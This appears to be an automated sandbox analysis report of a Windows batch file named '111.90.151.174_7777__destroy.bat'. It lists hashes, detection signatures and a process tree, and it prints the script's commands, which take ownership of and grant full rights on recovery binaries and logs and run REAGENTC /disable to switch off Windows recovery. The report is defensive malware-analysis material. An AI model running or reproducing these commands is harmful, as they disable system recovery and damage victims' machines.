Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
19-10-2022 17:06
Static task
static1
Behavioral task
behavioral1
Sample
111.90.151.174_7777__destroy.bat
Resource
win7-20220901-en
General
-
Target
111.90.151.174_7777__destroy.bat
-
Size
2KB
-
MD5
584db4d4d5e53b628193790c77f84d58
-
SHA1
ba7c740867ad6184e9971735cc6d1bedf1443078
-
SHA256
5218ed9598e05be41fc39d056e038c1a6fb054444ee3c5e8e54714ce1d258448
-
SHA512
05f5e8185714f068c0f804095867e1d875c0f970f61078f3f42effae565baf7a507daf841037df777745882901af74f40e18ade08f743ad368cb2b18c0eced6e
Malware Config
Signatures
-
Possible privilege escalation attempt 26 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 1960 takeown.exe 572 icacls.exe 1452 takeown.exe 1428 icacls.exe 1016 icacls.exe 1648 takeown.exe 464 icacls.exe 2004 icacls.exe 456 takeown.exe 1276 icacls.exe 1896 takeown.exe 1516 takeown.exe 1612 icacls.exe 964 takeown.exe 1976 takeown.exe 664 icacls.exe 1732 icacls.exe 580 icacls.exe 1768 takeown.exe 1196 icacls.exe 1152 takeown.exe 1912 takeown.exe 1816 takeown.exe 1632 icacls.exe 1564 takeown.exe 1520 icacls.exe -
Modifies file permissions 1 TTPs 26 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 964 takeown.exe 664 icacls.exe 1816 takeown.exe 1732 icacls.exe 456 takeown.exe 1768 takeown.exe 1196 icacls.exe 1976 takeown.exe 1648 takeown.exe 1960 takeown.exe 1428 icacls.exe 1016 icacls.exe 1632 icacls.exe 1564 takeown.exe 1520 icacls.exe 1152 takeown.exe 580 icacls.exe 1276 icacls.exe 1896 takeown.exe 572 icacls.exe 1452 takeown.exe 1516 takeown.exe 1612 icacls.exe 2004 icacls.exe 1912 takeown.exe 464 icacls.exe -
Drops file in System32 directory 2 IoCs
Processes:
ReAgentc.exedescription ioc process File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeTakeOwnershipPrivilege 1960 takeown.exe Token: SeTakeOwnershipPrivilege 456 takeown.exe Token: SeTakeOwnershipPrivilege 1768 takeown.exe Token: SeTakeOwnershipPrivilege 1896 takeown.exe Token: SeTakeOwnershipPrivilege 1452 takeown.exe Token: SeTakeOwnershipPrivilege 1152 takeown.exe Token: SeTakeOwnershipPrivilege 964 takeown.exe Token: SeTakeOwnershipPrivilege 1976 takeown.exe Token: SeTakeOwnershipPrivilege 1912 takeown.exe Token: SeTakeOwnershipPrivilege 1816 takeown.exe Token: SeTakeOwnershipPrivilege 1648 takeown.exe Token: SeTakeOwnershipPrivilege 1564 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2032 wrote to memory of 940 2032 cmd.exe cmd.exe PID 2032 wrote to memory of 940 2032 cmd.exe cmd.exe PID 2032 wrote to memory of 940 2032 cmd.exe cmd.exe PID 940 wrote to memory of 1960 940 cmd.exe takeown.exe PID 940 wrote to memory of 1960 940 cmd.exe takeown.exe PID 940 wrote to memory of 1960 940 cmd.exe takeown.exe PID 940 wrote to memory of 1732 940 cmd.exe icacls.exe PID 940 wrote to memory of 1732 940 cmd.exe icacls.exe PID 940 wrote to memory of 1732 940 cmd.exe icacls.exe PID 940 wrote to memory of 1204 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 1204 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 1204 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 1224 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 1224 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 1224 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 520 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 520 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 520 940 cmd.exe ReAgentc.exe PID 940 wrote to memory of 456 940 cmd.exe takeown.exe PID 940 wrote to memory of 456 940 cmd.exe takeown.exe PID 940 wrote to memory of 456 940 cmd.exe takeown.exe PID 940 wrote to memory of 580 940 cmd.exe icacls.exe PID 940 wrote to memory of 580 940 cmd.exe icacls.exe PID 940 wrote to memory of 580 940 cmd.exe icacls.exe PID 940 wrote to memory of 1768 940 cmd.exe takeown.exe PID 940 wrote to memory of 1768 940 cmd.exe takeown.exe PID 940 wrote to memory of 1768 940 cmd.exe takeown.exe PID 940 wrote to memory of 1276 940 cmd.exe icacls.exe PID 940 wrote to memory of 1276 940 cmd.exe icacls.exe PID 940 wrote to memory of 1276 940 cmd.exe icacls.exe PID 940 wrote to memory of 1896 940 cmd.exe takeown.exe PID 940 wrote to memory of 1896 940 cmd.exe takeown.exe PID 940 wrote to memory of 1896 940 cmd.exe takeown.exe PID 940 wrote to memory of 572 940 cmd.exe icacls.exe PID 940 wrote to memory of 572 940 cmd.exe icacls.exe PID 940 wrote to memory of 572 940 cmd.exe icacls.exe PID 940 wrote to memory of 1452 940 cmd.exe takeown.exe PID 940 wrote to memory of 1452 940 cmd.exe takeown.exe PID 940 wrote to memory of 1452 940 cmd.exe takeown.exe PID 940 wrote to memory of 1196 940 cmd.exe icacls.exe PID 940 wrote to memory of 1196 940 cmd.exe icacls.exe PID 940 wrote to memory of 1196 940 cmd.exe icacls.exe PID 940 wrote to memory of 1516 940 cmd.exe takeown.exe PID 940 wrote to memory of 1516 940 cmd.exe takeown.exe PID 940 wrote to memory of 1516 940 cmd.exe takeown.exe PID 940 wrote to memory of 1612 940 cmd.exe icacls.exe PID 940 wrote to memory of 1612 940 cmd.exe icacls.exe PID 940 wrote to memory of 1612 940 cmd.exe icacls.exe PID 940 wrote to memory of 1152 940 cmd.exe takeown.exe PID 940 wrote to memory of 1152 940 cmd.exe takeown.exe PID 940 wrote to memory of 1152 940 cmd.exe takeown.exe PID 940 wrote to memory of 1428 940 cmd.exe icacls.exe PID 940 wrote to memory of 1428 940 cmd.exe icacls.exe PID 940 wrote to memory of 1428 940 cmd.exe icacls.exe PID 940 wrote to memory of 964 940 cmd.exe takeown.exe PID 940 wrote to memory of 964 940 cmd.exe takeown.exe PID 940 wrote to memory of 964 940 cmd.exe takeown.exe PID 940 wrote to memory of 1016 940 cmd.exe icacls.exe PID 940 wrote to memory of 1016 940 cmd.exe icacls.exe PID 940 wrote to memory of 1016 940 cmd.exe icacls.exe PID 940 wrote to memory of 1976 940 cmd.exe takeown.exe PID 940 wrote to memory of 1976 940 cmd.exe takeown.exe PID 940 wrote to memory of 1976 940 cmd.exe takeown.exe PID 940 wrote to memory of 2004 940 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\111.90.151.174_7777__destroy.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\111.90.151.174_7777__destroy.bat" MY_FLAG2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\System32\rstrui.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\System32\rstrui.exe" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\ReAgentc.exeREAGENTC.EXE /disable3⤵
- Drops file in System32 directory
-
C:\Windows\System32\ReAgentc.exeREAGENTC.EXE /disable /logpath C:\Temp\Reagent.log3⤵
-
C:\Windows\System32\ReAgentc.exeREAGENTC.EXE /disable /logpath C:\Windows\Logs\Reagent3⤵
-
C:\Windows\System32\takeown.exeTAKEOWN /F "C:\Windows\System32\ReAgentc.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\icacls.exeICACLS "C:\Windows\System32\ReAgentc.exe" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\takeown.exeTAKEOWN /F "C:\Windows\Logs\ReAgent\ReAgent.log"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\icacls.exeICACLS "C:\Windows\Logs\ReAgent\ReAgent.log" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\takeown.exeTAKEOWN /F "C:\Windows\Logs\WinREAgent\diagerr.xml"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\icacls.exeICACLS "C:\Windows\Logs\WinREAgent\diagerr.xml" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\takeown.exeTAKEOWN /F "C:\Windows\Logs\WinREAgent\diagwrn.xml"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\icacls.exeICACLS "C:\Windows\Logs\WinREAgent\diagwrn.xml" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\ReAgent.xml"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\icacls.exeICACLS "C:\Windows\Logs\WinREAgent\diagwrn.xml" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\ReAgent.dll"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\icacls.exeICACLS "C:\Windows\System32\Recovery\ReAgent.dll" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\ReAgentTask.dll"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\System32\Recovery\ReAgentTask.dll" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\recdisc.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\System32\Recovery\recdisc.exe" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\recovery.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\System32\Recovery\recovery.exe" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\recovery.dll"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\System32\Recovery\recovery.dll" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\recovery.dll"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\System32\Recovery\recovery.dll" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\System32\Recovery\RecoveryDrive.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\System32\Recovery\RecoveryDrive.exe" /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\System32\Recovery\ReAgent.xmlFilesize
734B
MD5b90c609e64f6a5085e95e94908131e2f
SHA1e267458cdcd8ba084bb23189c9c3569a2b912090
SHA25695751ac34cdf3796244ea6298c6a53eb10a1a54faf5fcb0ff1b857e3e90b97f6
SHA51219a240ea24c53ac5027ad878d4c4cf375fdd5a70685c659100aab1ccba301052d1a2fc199c0bb5bc1b7ab32813e8ce5270419cb9974457a197633d701b3726fa
-
memory/456-63-0x0000000000000000-mapping.dmp
-
memory/464-85-0x0000000000000000-mapping.dmp
-
memory/520-61-0x0000000000000000-mapping.dmp
-
memory/572-68-0x0000000000000000-mapping.dmp
-
memory/580-64-0x0000000000000000-mapping.dmp
-
memory/664-81-0x0000000000000000-mapping.dmp
-
memory/940-54-0x0000000000000000-mapping.dmp
-
memory/964-76-0x0000000000000000-mapping.dmp
-
memory/1016-77-0x0000000000000000-mapping.dmp
-
memory/1152-74-0x0000000000000000-mapping.dmp
-
memory/1196-70-0x0000000000000000-mapping.dmp
-
memory/1204-57-0x0000000000000000-mapping.dmp
-
memory/1204-58-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmpFilesize
8KB
-
memory/1224-59-0x0000000000000000-mapping.dmp
-
memory/1276-66-0x0000000000000000-mapping.dmp
-
memory/1428-75-0x0000000000000000-mapping.dmp
-
memory/1452-69-0x0000000000000000-mapping.dmp
-
memory/1516-71-0x0000000000000000-mapping.dmp
-
memory/1520-87-0x0000000000000000-mapping.dmp
-
memory/1564-86-0x0000000000000000-mapping.dmp
-
memory/1612-73-0x0000000000000000-mapping.dmp
-
memory/1632-83-0x0000000000000000-mapping.dmp
-
memory/1648-84-0x0000000000000000-mapping.dmp
-
memory/1732-56-0x0000000000000000-mapping.dmp
-
memory/1768-65-0x0000000000000000-mapping.dmp
-
memory/1816-82-0x0000000000000000-mapping.dmp
-
memory/1896-67-0x0000000000000000-mapping.dmp
-
memory/1912-80-0x0000000000000000-mapping.dmp
-
memory/1960-55-0x0000000000000000-mapping.dmp
-
memory/1976-78-0x0000000000000000-mapping.dmp
-
memory/2004-79-0x0000000000000000-mapping.dmp